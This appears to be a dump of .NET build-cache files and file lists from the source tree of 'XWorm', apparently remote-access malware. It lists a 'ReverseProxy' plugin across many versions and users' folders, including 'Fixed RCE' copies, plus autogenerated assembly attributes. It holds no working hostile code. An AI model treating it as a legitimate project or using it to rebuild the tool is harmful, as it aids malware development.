C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.2 Optimized\XWorm V5.2\XWorm V5.2\XWorm V5.2\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.3 Optimized\XWorm V5.3\XWorm V5.3\XWorm V5.3\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.4 Optimized\XWorm V5.4\XWorm V5.4\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.xml
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm V5.5\Dark Worm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.5 Optimized\XWorm V5.5\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\XCoder\Desktop\Programs\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\HP\Desktop\XWorm V5.6 Optimized - USER HERE\XWorm V5.6\XWorm\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 Source Code\XWorm V6.0 SC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Copy\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - Auto\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.0 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Dark Worm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\Brwa\Desktop\NK\XWorm V6.3 SC Recovery - Fixed RCE - AutoDatabase 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\XWorm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\XWorm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\Projects\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
C:\Users\byt3d4sh\Desktop\src 2\XWorm\bin\Debug\Plugins\ReverseProxy.dll
C:\Users\byt3d4sh\Desktop\src 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\Plugin.Resources.resources
C:\Users\byt3d4sh\Desktop\src 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\src 2\Plugins\ReverseProxy\ReverseProxy\obj\Debug\ReverseProxy.dll
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName:=".NET Framework 4")>
@@ -0,0 +1,7 @@
' <autogenerated/>
Option Strict Off
Option Explicit On
Imports System
Imports System.Reflection
<Assembly: Global.System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName:=".NET Framework 4.8")>
@@ -0,0 +1 @@
be1bd84e95f6251124795debf8aca999934be7dabb526dc321bf76ceb629afb7
@@ -0,0 +1,8 @@
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\bin\Release\ReverseProxy.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\bin\Release\ReverseProxy.pdb
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Release\ReverseProxy.vbproj.AssemblyReference.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Release\Plugin.Resources.resources
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Release\ReverseProxy.vbproj.GenerateResource.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Release\ReverseProxy.vbproj.CoreCompileInputs.cache
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Release\ReverseProxy.dll
C:\Users\byt3d4sh\Desktop\XWorm SRC\Plugins\ReverseProxy\ReverseProxy\obj\Release\ReverseProxy.pdb